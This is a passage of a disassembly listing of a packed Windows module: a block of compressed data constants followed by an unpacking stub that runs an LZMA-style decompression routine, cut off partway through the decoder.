dd 6CA612B6h, 5E64A686h, 36CE2637h, 2F03E7C9h, 8FCE9C51h
dd 0ACE6A980h, 5D1774B7h, 1D5A3D05h, 0F04BCF0Bh, 0B411EBBh
dd 0B676C161h, 820B80A5h, 4AC89C2Fh, 9C7C2143h, 0C519A08Bh
dd 686EF3CEh, 0ABBD67C7h, 49E84A57h, 0CF5702A8h, 0D69793C1h
dd 26FBCBD1h, 0EE1E159Ch, 0F831779Ch, 0C051CEE5h, 42C641EDh
dd 78C72247h, 0B0FBD3BDh, 96B13ACEh, 0AE1C6E5Eh, 0C28BF7B5h
dd 72D74A2Dh, 29D7760Dh, 137B2BCFh, 0B54233Eh, 96334CECh
dd 301DC8AEh, 457D48h, 5CB64707h, 0D1943EC2h, 149D93CFh
dd 8822593Ch, 0CFB902EEh, 44F07DAAh, 0FE0A6AF9h, 0E73565DAh
dd 8AB4D631h, 0C514125h, 38A10CA8h, 9EDB7DADh, 625847FAh
dd 70E857EAh, 0B8104DB0h, 5A1065Fh, 0F88D10D0h, 0F477FCFFh
dd 2E302884h, 232D2983h, 0F12E105h, 7E361F83h, 436A1B0h
dd 0D85BB221h, 4EDD598Ah, 31AD0AA8h, 0A6C94CBEh, 0FE4D51CCh
dd 937A9BBBh, 9DCA6FDDh, 1E83E48Eh, 0A5CECB00h, 13774829h
dd 7F9FD07h, 0A09F2436h, 0D3E605AEh, 3F577DA7h, 5A1638ACh
dd 5A89E878h, 0D3B5E304h, 1C467E32h, 0C28F791h, 2EB5EB11h
dd 4E476B51h, 3C38DE40h, 6E57386Dh, 0C2B50B94h, 5FF0185Eh
dd 0EB819A8Bh, 2916332Bh, 40B6E092h, 0FFF43454h, 76282901h
dd 31739B8Fh, 0CFEFE27Bh, 12795E0Ah, 0E5D459FBh, 8155D4A6h
dd 3A64A919h, 0CF16830Dh, 4655EF4Ah, 3187A2E1h, 79F762Eh
dd 6D6B97E9h, 8318EBD0h, 0EAFCD225h, 756133F2h, 0FB334A71h
dd 5AA14142h, 0E5A06BA0h, 0CFA88B0h, 0A8ECBA30h, 509F38C4h
dd 8DA1A4D7h, 0EE4A3A69h, 0A877B562h, 15493450h, 25C7381Fh
dd 0B0A3BF8Ch, 9F3058B5h, 49C221A4h, 0B86F1A1Ch, 59DE3137h
dd 5278176Ah, 0F9BBC392h, 90F2117Ah, 3A590EFFh, 0E86E3572h
dd 0C43EE349h, 0CB7CDB09h, 0C522B7B9h, 57DB8D65h, 0CFFF86E0h
dd 93618839h, 610DEF43h, 541EA205h, 0DFFC43E9h, 0DAD9D0A8h
dd 15489525h, 5496274Ah, 0C29137E9h, 47F06E09h, 0F6372E37h
dd 0D6961A8h, 50186CFEh, 88E2AA97h, 40C3826Dh, 0C77FEE87h
dd 2C5EA6CEh, 8B7E9FCEh, 2369AA00h, 0A83EA6D8h, 0F737836Fh
dd 0A263BA0Eh, 0E7547185h, 3C025DBh, 0DA81BEEFh, 3678AA42h
dd 38A50FCCh, 1E1DC039h, 0B099F697h, 0CBCCC598h, 9C7F545Bh
dd 0AAE2787Bh, 0A28FF698h, 43C044Dh, 17E8D882h, 1EF806D1h
dd 7E2AE217h, 0C0E12B55h, 0A73669ADh, 748387B9h, 4431C2E9h
dd 0A1F1C6CFh, 2E7C60B0h, 0C87AF309h, 85111F70h, 804053CDh
dd 3B6D475h, 210B05E1h, 22F6205h, 0D0CC5916h, 0B976EC14h
dd 17B47633h, 31F307E9h, 64034DD8h, 89B9E71Eh, 0B91F7F05h
dd 0F498EACBh, 2CA2588Eh, 7AC7528Eh, 2E058ABDh, 45F0B84Eh
dd 62BE91D5h, 0A6DF400Ah, 0D11DD5B8h, 0DB839A3Eh, 1E76B4B9h
dd 0F8FD38FBh, 0FABF446Ch, 3627C712h, 0B561779Bh, 66939E41h
dd 0B9C3775Bh, 354B2514h, 71E52E35h, 8F42C774h, 0C9AC20ABh
dd 0CF5B7B1Fh, 0DFE28AD7h, 0D0E42191h, 39622E35h, 6B908C9Bh
dd 857D5761h, 0C824FA75h, 0B3412215h, 69483934h, 57037AA2h
dd 2EB2E865h, 4103731Fh, 152A5D06h, 32FAB9DFh, 0C05CD65h
dd 0E538E378h, 0E105A60h, 0F2CA289Eh, 89E358ABh, 435B0E1Bh
dd 0FCF56B8Ch, 0DD3316C4h, 95D86050h, 91F4E1F1h, 0B1D53414h
dd 40BAB757h, 88FD5E3Ch, 0C098AEB6h, 0D61400B8h, 0C8760330h
dd 602FBAE9h, 0A7221733h, 8AB72939h, 0E5861B69h, 842E6DBEh
dd 8D572EB6h, 0F276FA11h, 1A615789h, 0C79DE7ABh, 0E884BB7Fh
dd 0ED5B57A3h, 3D17561Eh, 0EFB13CCAh, 2FEA14B6h, 0BE5B9918h
dd 8662E773h, 35D71FE4h, 15C0AD13h, 210F4B0Eh, 0B54E9CDDh
dd 0F52A9B3Dh, 809431D4h, 2A6CA03Bh, 6C7312A9h, 59F95C29h
dd 5452106Fh, 6D5B55D0h, 2F35559h, 97549F13h, 1EB77FB4h
dd 0E2CC2F9Fh, 5D23A25h, 0A37ACDACh, 736E61AFh, 2ED2DD2Bh
dd 19B9A6E3h, 1EB6F66Ch, 5132ABCCh, 6C9BA8D7h, 0BCEFE164h
dd 0AB8B9D70h, 0EC337AB3h, 467856AFh, 6C3C6338h, 0F625A2C5h
dd 0DE6D7ECh, 8CD9F042h, 0D63D87B6h, 57E5BB5Ch, 0CA47BE6h
dd 0E712A991h, 0F76BAF8Eh, 0A747CC63h, 82A76166h, 875FDA5Eh
dd 2C3E2E6Bh, 4E91D936h, 0AB340A7Ch, 58F1EF51h, 76FFFC78h
dd 5F269F64h, 0E802A566h, 0BA2CA8A3h, 88FC99Dh, 333C186Bh
dd 0EBE38F6Fh, 9839C518h, 0CDB499F6h, 57D266CEh, 6B1842CCh
dd 0C5CEE6C2h, 0BD34338Eh, 0B91F8706h, 8292099Fh, 86B94859h
dd 66D005C8h, 1881B633h, 0C60758F1h, 265FBCAh, 696BBE1Dh
dd 7A133B3Ch, 0F3347F83h, 9EB2721Dh, 8C742409h, 4B55B5B8h
dd 8942147h, 0AC16C41Bh, 0B55FDEB8h, 0A86013FBh, 30587D93h
dd 92188E7Eh, 91ACE92h, 146A2838h, 0F69F63EFh, 6C885499h
dd 2F13DF85h, 4982C4A2h, 1E05562Eh, 0EC0CABBCh, 8DB55C2Eh
dd 0A0379873h, 0EF443CD7h, 0F475384h, 4107E80Bh, 3023A495h
dd 53A940CEh, 0BCDB6190h, 0D8885AB1h, 5EA55B0Ch, 0FA80B8F2h
dd 0F44C5552h, 0E5D81FA7h, 289339EEh, 65AF128Ah, 0A1D9BE71h
dd 0F87813E1h, 50AB41A8h, 4D0547BFh, 2B9D2EA9h, 648A67Eh
dd 9D7BDCB4h, 0B9ADA908h, 0D0185D82h, 0CCF52D7Ch, 5EE12411h
dd 0C7854067h, 0A4B690FBh, 0AF38342Bh, 5A6E616Bh, 7104CEC7h
dd 73F2065h, 5538AF19h, 89BDA5FEh, 84EBF0B8h, 5922A9F8h
dd 0F854A65h, 0F8E2131h, 0DB179D71h, 831438F0h, 0E69D3306h
dd 1525C3D9h, 4FAB6C1Dh, 0C7DAD23Ch, 0A2989C2Fh, 40088DFCh
dd 3C3E4616h, 0AC0C96A4h, 0F3FCE97Eh, 624577E0h, 0E4DFEFAFh
dd 0B60E3B0Bh, 0C3CC90AFh, 0DBBCF09Bh, 0A85FA1CAh, 24728955h
dd 87B24CF1h, 0F80A57FEh, 13BC3845h, 0DBF7F4A2h, 8B0F2648h
dd 0F1EEC3ACh, 317D15DFh, 0C6B35468h, 0A7DE071Ah, 73408174h
dd 46B2D706h, 53456295h, 0B9B90470h, 44BCADA8h, 6471136h
dd 9C2DC61Fh, 5CFD965Bh, 0E662298Dh, 5B1D39F7h, 69F16AFEh
dd 3954B35Ch, 24DF4432h, 4A97B55Fh, 399C4490h, 0B9E61846h
dd 0F6016227h, 9082EAE0h, 8032AE31h, 4081DC26h, 0FD56C877h
dd 0C53B711h, 3C0737DFh, 3762A67Bh, 0D0A6CD09h, 0E90EEE71h
dd 0ABBB494Fh, 88C01F55h, 9453B45Bh, 0C36FAA66h, 0A60098F9h
dd 88D8DEDFh, 735D3E5Ah, 2034792Fh, 0E15069EDh, 0D165F920h
dd 28E64636h, 0CD1E7F08h, 0DFB3FF1Ah, 0FB1E6083h, 0F09439B4h
dd 0EB53324Eh, 4CD1C010h, 0EDA32349h, 0DDA3D634h, 0CC2C92F5h
dd 80C15088h, 99CE0F83h, 92126560h, 929224D3h, 4E9FF84Eh
dd 922D979Eh, 0A06367Dh, 5AA601F8h, 4BE07C00h, 0E7D06245h
dd 5253F0B4h, 0B3B6DC02h, 3C02459Eh, 0B97A5EFAh, 86162316h
dd 8221324Bh, 864244B1h, 0D3F73E55h, 0C1C6A973h, 46E8D5D8h
dd 1B2159CCh, 33F65BD5h, 0BE9E42CBh, 712071Fh, 0BAD37C56h
dd 0D674C24Eh, 719B5C68h, 796B8D61h, 0B4955B11h, 0CC793DB3h
dd 28675B0Eh, 9EF015A8h, 7EEA42B8h, 0FE504601h, 0E0DDDB8Ah
dd 0B3647A99h, 4577A14Ah, 0AF3A79B2h, 0D3DD8B7Ah, 0AC1C7B02h
dd 4249AC95h, 8137E22h, 0BD717341h, 0A0C0ABh, 2 dup(0)
; ---------------------------------------------------------------------------
cmp byte ptr [esp+8], 1
jnz loc_9C5F62
pusha
mov esi, offset dword_9B8000
lea edi, [esi-17000h]
push edi
mov ebp, esp
lea ebx, [esp-3E80h]
xor eax, eax
loc_9C5393: ; CODE XREF: .text:009C5396�j
push eax
cmp esp, ebx
jnz short loc_9C5393
inc esi
inc esi
push ebx
push 23BAEh
push edi
add ebx, 4
push ebx
push 0D366h
push esi
add ebx, 4
push ebx
push eax
mov dword ptr [ebx], 3
nop
nop
push ebp
push edi
push esi
push ebx
sub esp, 7Ch
mov edx, [esp+90h]
mov dword ptr [esp+74h], 0
mov byte ptr [esp+73h], 0
mov ebp, [esp+9Ch]
lea eax, [edx+4]
mov [esp+78h], eax
mov eax, 1
movzx ecx, byte ptr [edx+2]
mov ebx, eax
shl ebx, cl
mov ecx, ebx
dec ecx
mov [esp+6Ch], ecx
movzx ecx, byte ptr [edx+1]
shl eax, cl
dec eax
mov [esp+68h], eax
mov eax, [esp+0A8h]
movzx esi, byte ptr [edx]
mov dword ptr [ebp+0], 0
mov dword ptr [esp+60h], 0
mov dword ptr [eax], 0
mov eax, 300h
mov [esp+64h], esi
mov dword ptr [esp+5Ch], 1
mov dword ptr [esp+58h], 1
mov dword ptr [esp+54h], 1
mov dword ptr [esp+50h], 1
movzx ecx, byte ptr [edx+1]
add ecx, esi
shl eax, cl
lea ecx, [eax+736h]
cmp [esp+74h], ecx
jnb short loc_9C546A
mov eax, [esp+78h]
loc_9C5460: ; CODE XREF: .text:009C5468�j
mov word ptr [eax], 400h
add eax, 2
loop loc_9C5460
loc_9C546A: ; CODE XREF: .text:009C545A�j
mov ebx, [esp+94h]
xor edi, edi
mov dword ptr [esp+48h], 0FFFFFFFFh
mov edx, ebx
add edx, [esp+98h]
mov [esp+4Ch], edx
xor edx, edx
loc_9C548A: ; CODE XREF: .text:009C54A1�j
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
inc edx
inc ebx
or edi, eax
cmp edx, 4
jle short loc_9C548A
mov ecx, [esp+0A4h]
cmp [esp+74h], ecx
jnb loc_9C5E18
loc_9C54B4: ; CODE XREF: .text:009C5DF3�j
mov esi, [esp+74h]
and esi, [esp+6Ch]
mov eax, [esp+60h]
mov edx, [esp+78h]
shl eax, 4
mov [esp+44h], esi
add eax, esi
cmp dword ptr [esp+48h], 0FFFFFFh
lea ebp, [edx+eax*2]
ja short loc_9C54F2
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C54F2: ; CODE XREF: .text:009C54D8�j
mov eax, [esp+48h]
mov dx, [ebp+0]
shr eax, 0Bh
movzx ecx, dx
imul eax, ecx
cmp edi, eax
jnb loc_9C56E8
mov [esp+48h], eax
mov eax, 800h
sub eax, ecx
mov cl, [esp+64h]
sar eax, 5
mov esi, 1
lea eax, [edx+eax]
movzx edx, byte ptr [esp+73h]
mov [ebp+0], ax
mov eax, [esp+74h]
and eax, [esp+68h]
mov ebp, [esp+78h]
shl eax, cl
mov ecx, 8
sub ecx, [esp+64h]
sar edx, cl
add eax, edx
imul eax, 600h
cmp dword ptr [esp+60h], 6
lea eax, [ebp+eax+0E6Ch]
mov [esp+14h], eax
jle loc_9C562F
mov eax, [esp+74h]
sub eax, [esp+5Ch]
mov edx, [esp+0A0h]
movzx eax, byte ptr [edx+eax]
mov [esp+40h], eax
loc_9C557C: ; CODE XREF: .text:009C561F�j
shl dword ptr [esp+40h], 1
mov ecx, [esp+40h]
lea edx, [esi+esi]
mov ebp, [esp+14h]
and ecx, 100h
cmp dword ptr [esp+48h], 0FFFFFFh
lea eax, [ebp+ecx*2+0]
mov [esp+3Ch], ecx
lea ebp, [eax+edx]
ja short loc_9C55BE
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C55BE: ; CODE XREF: .text:009C55A4�j
mov eax, [esp+48h]
mov cx, [ebp+200h]
shr eax, 0Bh
movzx esi, cx
imul eax, esi
cmp edi, eax
jnb short loc_9C55F9
mov [esp+48h], eax
mov eax, 800h
sub eax, esi
mov esi, edx
sar eax, 5
cmp dword ptr [esp+3Ch], 0
lea eax, [ecx+eax]
mov [ebp+200h], ax
jz short loc_9C5619
jmp short loc_9C5627
; ---------------------------------------------------------------------------
loc_9C55F9: ; CODE XREF: .text:009C55D4�j
sub [esp+48h], eax
sub edi, eax
mov eax, ecx
lea esi, [edx+1]
shr ax, 5
sub cx, ax
cmp dword ptr [esp+3Ch], 0
mov [ebp+200h], cx
jz short loc_9C5627
loc_9C5619: ; CODE XREF: .text:009C55F5�j
cmp esi, 0FFh
jle loc_9C557C
jmp short loc_9C56A0
; ---------------------------------------------------------------------------
loc_9C5627: ; CODE XREF: .text:009C55F7�j
; .text:009C5617�j ...
cmp esi, 0FFh
jg short loc_9C56A0
loc_9C562F: ; CODE XREF: .text:009C555F�j
lea edx, [esi+esi]
mov ebp, [esp+14h]
add ebp, edx
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C565A
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C565A: ; CODE XREF: .text:009C5640�j
mov eax, [esp+48h]
mov cx, [ebp+0]
shr eax, 0Bh
movzx esi, cx
imul eax, esi
cmp edi, eax
jnb short loc_9C5688
mov [esp+48h], eax
mov eax, 800h
sub eax, esi
mov esi, edx
sar eax, 5
lea eax, [ecx+eax]
mov [ebp+0], ax
jmp short loc_9C5627
; ---------------------------------------------------------------------------
loc_9C5688: ; CODE XREF: .text:009C566D�j
sub [esp+48h], eax
sub edi, eax
mov eax, ecx
lea esi, [edx+1]
shr ax, 5
sub cx, ax
mov [ebp+0], cx
jmp short loc_9C5627
; ---------------------------------------------------------------------------
loc_9C56A0: ; CODE XREF: .text:009C5625�j
; .text:009C562D�j
mov edx, [esp+74h]
mov eax, esi
mov ecx, [esp+0A0h]
mov [esp+73h], al
mov [edx+ecx], al
inc edx
cmp dword ptr [esp+60h], 3
mov [esp+74h], edx
jg short loc_9C56CD
mov dword ptr [esp+60h], 0
jmp loc_9C5DE8
; ---------------------------------------------------------------------------
loc_9C56CD: ; CODE XREF: .text:009C56BE�j
cmp dword ptr [esp+60h], 9
jg short loc_9C56DE
sub dword ptr [esp+60h], 3
jmp loc_9C5DE8
; ---------------------------------------------------------------------------
loc_9C56DE: ; CODE XREF: .text:009C56D2�j
sub dword ptr [esp+60h], 6
jmp loc_9C5DE8
; ---------------------------------------------------------------------------
loc_9C56E8: ; CODE XREF: .text:009C5505�j
mov ecx, [esp+48h]
sub edi, eax
mov esi, [esp+60h]
sub ecx, eax
mov eax, edx
shr ax, 5
sub dx, ax
cmp ecx, 0FFFFFFh
mov [ebp+0], dx
mov ebp, [esp+78h]
lea esi, [ebp+esi*2+0]
mov [esp+38h], esi
ja short loc_9C572B
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl ecx, 8
inc ebx
or edi, eax
loc_9C572B: ; CODE XREF: .text:009C5713�j
mov ebp, [esp+38h]
mov eax, ecx
shr eax, 0Bh
mov dx, [ebp+180h]
movzx ebp, dx
imul eax, ebp
cmp edi, eax
jnb short loc_9C5797
mov esi, eax
mov eax, 800h
sub eax, ebp
mov ebp, [esp+58h]
sar eax, 5
mov ecx, [esp+54h]
lea eax, [edx+eax]
mov edx, [esp+38h]
mov [esp+50h], ecx
mov ecx, [esp+78h]
mov [edx+180h], ax
mov eax, [esp+5Ch]
mov [esp+54h], ebp
mov [esp+58h], eax
xor eax, eax
cmp dword ptr [esp+60h], 6
setnle al
add ecx, 664h
lea eax, [eax+eax*2]
mov [esp+60h], eax
jmp loc_9C5A0B
; ---------------------------------------------------------------------------
loc_9C5797: ; CODE XREF: .text:009C5743�j
mov esi, ecx
sub edi, eax
sub esi, eax
mov eax, edx
shr ax, 5
mov ecx, [esp+38h]
sub dx, ax
cmp esi, 0FFFFFFh
mov [ecx+180h], dx
ja short loc_9C57CF
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl esi, 8
inc ebx
or edi, eax
loc_9C57CF: ; CODE XREF: .text:009C57B7�j
mov ebp, [esp+38h]
mov edx, esi
shr edx, 0Bh
mov cx, [ebp+198h]
movzx eax, cx
imul edx, eax
cmp edi, edx
jnb loc_9C58D0
mov ebp, 800h
mov esi, edx
sub ebp, eax
mov dword ptr [esp+34h], 800h
mov eax, ebp
sar eax, 5
lea eax, [ecx+eax]
mov ecx, [esp+38h]
mov [ecx+198h], ax
mov eax, [esp+60h]
mov ecx, [esp+44h]
shl eax, 5
add eax, [esp+78h]
cmp edx, 0FFFFFFh
lea ebp, [eax+ecx*2]
ja short loc_9C5841
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl esi, 8
inc ebx
or edi, eax
loc_9C5841: ; CODE XREF: .text:009C5829�j
mov dx, [ebp+1E0h]
mov eax, esi
shr eax, 0Bh
movzx ecx, dx
imul eax, ecx
cmp edi, eax
jnb short loc_9C58B7
sub [esp+34h], ecx
sar dword ptr [esp+34h], 5
mov esi, [esp+34h]
mov [esp+48h], eax
cmp dword ptr [esp+74h], 0
lea eax, [edx+esi]
mov [ebp+1E0h], ax
jz loc_9C5E10
xor eax, eax
cmp dword ptr [esp+60h], 6
mov ebp, [esp+0A0h]
mov edx, [esp+74h]
setnle al
lea eax, [eax+eax+9]
mov [esp+60h], eax
mov eax, [esp+74h]
sub eax, [esp+5Ch]
mov al, [ebp+eax+0]
mov [esp+73h], al
mov [edx+ebp], al
inc edx
mov [esp+74h], edx
jmp loc_9C5DE8
; ---------------------------------------------------------------------------
loc_9C58B7: ; CODE XREF: .text:009C5855�j
sub esi, eax
sub edi, eax
mov eax, edx
shr ax, 5
sub dx, ax
mov [ebp+1E0h], dx
jmp loc_9C59EF
; ---------------------------------------------------------------------------
loc_9C58D0: ; CODE XREF: .text:009C57E7�j
mov eax, ecx
sub esi, edx
shr ax, 5
mov ebp, [esp+38h]
sub cx, ax
sub edi, edx
cmp esi, 0FFFFFFh
mov [ebp+198h], cx
ja short loc_9C5906
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl esi, 8
inc ebx
or edi, eax
loc_9C5906: ; CODE XREF: .text:009C58EE�j
mov ecx, [esp+38h]
mov eax, esi
shr eax, 0Bh
mov dx, [ecx+1B0h]
movzx ecx, dx
imul eax, ecx
cmp edi, eax
jnb short loc_9C5943
mov esi, eax
mov eax, 800h
sub eax, ecx
mov ebp, [esp+38h]
sar eax, 5
lea eax, [edx+eax]
mov [ebp+1B0h], ax
mov eax, [esp+58h]
jmp loc_9C59E3
; ---------------------------------------------------------------------------
loc_9C5943: ; CODE XREF: .text:009C591E�j
mov ecx, esi
sub edi, eax
sub ecx, eax
mov eax, edx
shr ax, 5
sub dx, ax
mov eax, [esp+38h]
cmp ecx, 0FFFFFFh
mov [eax+1B0h], dx
ja short loc_9C597B
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl ecx, 8
inc ebx
or edi, eax
loc_9C597B: ; CODE XREF: .text:009C5963�j
mov esi, [esp+38h]
mov eax, ecx
shr eax, 0Bh
mov dx, [esi+1C8h]
movzx ebp, dx
imul eax, ebp
cmp edi, eax
jnb short loc_9C59B5
mov esi, eax
mov eax, 800h
sub eax, ebp
mov ebp, [esp+38h]
sar eax, 5
lea eax, [edx+eax]
mov [ebp+1C8h], ax
mov eax, [esp+54h]
jmp short loc_9C59DB
; ---------------------------------------------------------------------------
loc_9C59B5: ; CODE XREF: .text:009C5993�j
mov esi, ecx
sub edi, eax
sub esi, eax
mov eax, edx
shr ax, 5
sub dx, ax
mov eax, [esp+38h]
mov [eax+1C8h], dx
mov edx, [esp+54h]
mov eax, [esp+50h]
mov [esp+50h], edx
loc_9C59DB: ; CODE XREF: .text:009C59B3�j
mov ecx, [esp+58h]
mov [esp+54h], ecx
loc_9C59E3: ; CODE XREF: .text:009C593E�j
mov ebp, [esp+5Ch]
mov [esp+5Ch], eax
mov [esp+58h], ebp
loc_9C59EF: ; CODE XREF: .text:009C58CB�j
xor eax, eax
cmp dword ptr [esp+60h], 6
mov ecx, [esp+78h]
setnle al
add ecx, 0A68h
lea eax, [eax+eax*2+8]
mov [esp+60h], eax
loc_9C5A0B: ; CODE XREF: .text:009C5792�j
cmp esi, 0FFFFFFh
ja short loc_9C5A29
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl esi, 8
inc ebx
or edi, eax
loc_9C5A29: ; CODE XREF: .text:009C5A11�j
mov dx, [ecx]
mov eax, esi
shr eax, 0Bh
movzx ebp, dx
imul eax, ebp
cmp edi, eax
jnb short loc_9C5A6A
mov [esp+48h], eax
mov eax, 800h
sub eax, ebp
shl dword ptr [esp+44h], 4
sar eax, 5
mov dword ptr [esp+2Ch], 0
lea eax, [edx+eax]
mov [ecx], ax
mov eax, [esp+44h]
lea ecx, [ecx+eax+4]
mov [esp+10h], ecx
jmp short loc_9C5ADC
; ---------------------------------------------------------------------------
loc_9C5A6A: ; CODE XREF: .text:009C5A39�j
sub esi, eax
sub edi, eax
mov eax, edx
shr ax, 5
sub dx, ax
cmp esi, 0FFFFFFh
mov [ecx], dx
ja short loc_9C5A98
cmp ebx, [esp+4Ch]
jz loc_9C5E10
movzx eax, byte ptr [ebx]
shl edi, 8
shl esi, 8
inc ebx
or edi, eax
loc_9C5A98: ; CODE XREF: .text:009C5A80�j
mov dx, [ecx+2]
mov eax, esi
shr eax, 0Bh
movzx ebp, dx
imul eax, ebp
cmp edi, eax
jnb short loc_9C5AE6
mov [esp+48h], eax
mov eax, 800h
sub eax, ebp
shl dword ptr [esp+44h], 4
sar eax, 5
mov dword ptr [esp+2Ch], 8
lea eax, [edx+eax]
mov edx, [esp+44h]
mov [ecx+2], ax
lea ecx, [ecx+edx+104h]
mov [esp+10h], ecx
loc_9C5ADC: ; CODE XREF: .text:009C5A68�j
mov dword ptr [esp+30h], 3
jmp short loc_9C5B15
; ---------------------------------------------------------------------------
loc_9C5AE6: ; CODE XREF: .text:009C5AA9�j
sub esi, eax
sub edi, eax
mov eax, edx
mov [esp+48h], esi
shr ax, 5
mov dword ptr [esp+2Ch], 10h
sub dx, ax
mov dword ptr [esp+30h], 8
mov [ecx+2], dx
add ecx, 204h
mov [esp+10h], ecx
loc_9C5B15: ; CODE XREF: .text:009C5AE4�j
mov ecx, [esp+30h]
mov edx, 1
mov [esp+28h], ecx
loc_9C5B22: ; CODE XREF: .text:009C5B97�j
lea ebp, [edx+edx]
mov esi, [esp+10h]
add esi, ebp
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C5B4D
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C5B4D: ; CODE XREF: .text:009C5B33�j
mov eax, [esp+48h]
mov dx, [esi]
shr eax, 0Bh
movzx ecx, dx
imul eax, ecx
cmp edi, eax
jnb short loc_9C5B79
mov [esp+48h], eax
mov eax, 800h
sub eax, ecx
sar eax, 5
lea eax, [edx+eax]
mov edx, ebp
mov [esi], ax
jmp short loc_9C5B8E
; ---------------------------------------------------------------------------
loc_9C5B79: ; CODE XREF: .text:009C5B5F�j
sub [esp+48h], eax
sub edi, eax
mov eax, edx
shr ax, 5
sub dx, ax
mov [esi], dx
lea edx, [ebp+1]
loc_9C5B8E: ; CODE XREF: .text:009C5B77�j
mov esi, [esp+28h]
dec esi
mov [esp+28h], esi
jnz short loc_9C5B22
mov cl, [esp+30h]
mov eax, 1
shl eax, cl
sub edx, eax
add edx, [esp+2Ch]
cmp dword ptr [esp+60h], 3
mov [esp+0Ch], edx
jg loc_9C5DA0
add dword ptr [esp+60h], 7
cmp edx, 3
mov eax, edx
jle short loc_9C5BCA
mov eax, 3
loc_9C5BCA: ; CODE XREF: .text:009C5BC3�j
mov esi, [esp+78h]
shl eax, 7
mov dword ptr [esp+24h], 6
lea eax, [esi+eax+360h]
mov [esp+8], eax
mov eax, 1
loc_9C5BE9: ; CODE XREF: .text:009C5C5E�j
lea ebp, [eax+eax]
mov esi, [esp+8]
add esi, ebp
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C5C14
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C5C14: ; CODE XREF: .text:009C5BFA�j
mov eax, [esp+48h]
mov dx, [esi]
shr eax, 0Bh
movzx ecx, dx
imul eax, ecx
cmp edi, eax
jnb short loc_9C5C40
mov [esp+48h], eax
mov eax, 800h
sub eax, ecx
sar eax, 5
lea eax, [edx+eax]
mov [esi], ax
mov eax, ebp
jmp short loc_9C5C55
; ---------------------------------------------------------------------------
loc_9C5C40: ; CODE XREF: .text:009C5C26�j
sub [esp+48h], eax
sub edi, eax
mov eax, edx
shr ax, 5
sub dx, ax
lea eax, [ebp+1]
mov [esi], dx
loc_9C5C55: ; CODE XREF: .text:009C5C3E�j
mov ebp, [esp+24h]
dec ebp
mov [esp+24h], ebp
jnz short loc_9C5BE9
lea edx, [eax-40h]
cmp edx, 3
mov [esp], edx
jle loc_9C5D96
mov eax, edx
mov esi, edx
sar eax, 1
and esi, 1
lea ecx, [eax-1]
or esi, 2
cmp edx, 0Dh
mov [esp+20h], ecx
jg short loc_9C5CA3
mov ebp, [esp+78h]
shl esi, cl
add edx, edx
mov [esp], esi
lea eax, [ebp+esi*2+0]
sub eax, edx
add eax, 55Eh
mov [esp+4], eax
jmp short loc_9C5CF9
; ---------------------------------------------------------------------------
loc_9C5CA3: ; CODE XREF: .text:009C5C85�j
lea edx, [eax-5]
loc_9C5CA6: ; CODE XREF: .text:009C5CDC�j
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C5CC8
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C5CC8: ; CODE XREF: .text:009C5CAE�j
shr dword ptr [esp+48h], 1
add esi, esi
cmp edi, [esp+48h]
jb short loc_9C5CDB
sub edi, [esp+48h]
or esi, 1
loc_9C5CDB: ; CODE XREF: .text:009C5CD2�j
dec edx
jnz short loc_9C5CA6
mov eax, [esp+78h]
shl esi, 4
mov [esp], esi
add eax, 644h
mov dword ptr [esp+20h], 4
mov [esp+4], eax
loc_9C5CF9: ; CODE XREF: .text:009C5CA1�j
mov dword ptr [esp+1Ch], 1
mov eax, 1
loc_9C5D06: ; CODE XREF: .text:009C5D90�j
mov ebp, [esp+4]
add eax, eax
mov [esp+18h], eax
add ebp, eax
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C5D34
cmp ebx, [esp+4Ch]
jz loc_9C5E10
shl dword ptr [esp+48h], 8
movzx eax, byte ptr [ebx]
shl edi, 8
inc ebx
or edi, eax
loc_9C5D34: ; CODE XREF: .text:009C5D1A�j
mov eax, [esp+48h]
mov dx, [ebp+0]
shr eax, 0Bh
movzx esi, dx
imul eax, esi
cmp edi, eax
jnb short loc_9C5D64
mov [esp+48h], eax
mov eax, 800h
sub eax, esi
sar eax, 5
lea eax, [edx+eax]
mov [ebp+0], ax
mov eax, [esp+18h]
jmp short loc_9C5D83
; ---------------------------------------------------------------------------
loc_9C5D64: ; CODE XREF: .text:009C5D47�j
sub [esp+48h], eax
sub edi, eax
mov eax, edx
shr ax, 5
sub dx, ax
mov eax, [esp+18h]
mov [ebp+0], dx
mov edx, [esp+1Ch]
inc eax
or [esp], edx
loc_9C5D83: ; CODE XREF: .text:009C5D62�j
mov ecx, [esp+20h]
shl dword ptr [esp+1Ch], 1
dec ecx
mov [esp+20h], ecx
jnz loc_9C5D06
loc_9C5D96: ; CODE XREF: .text:009C5C69�j
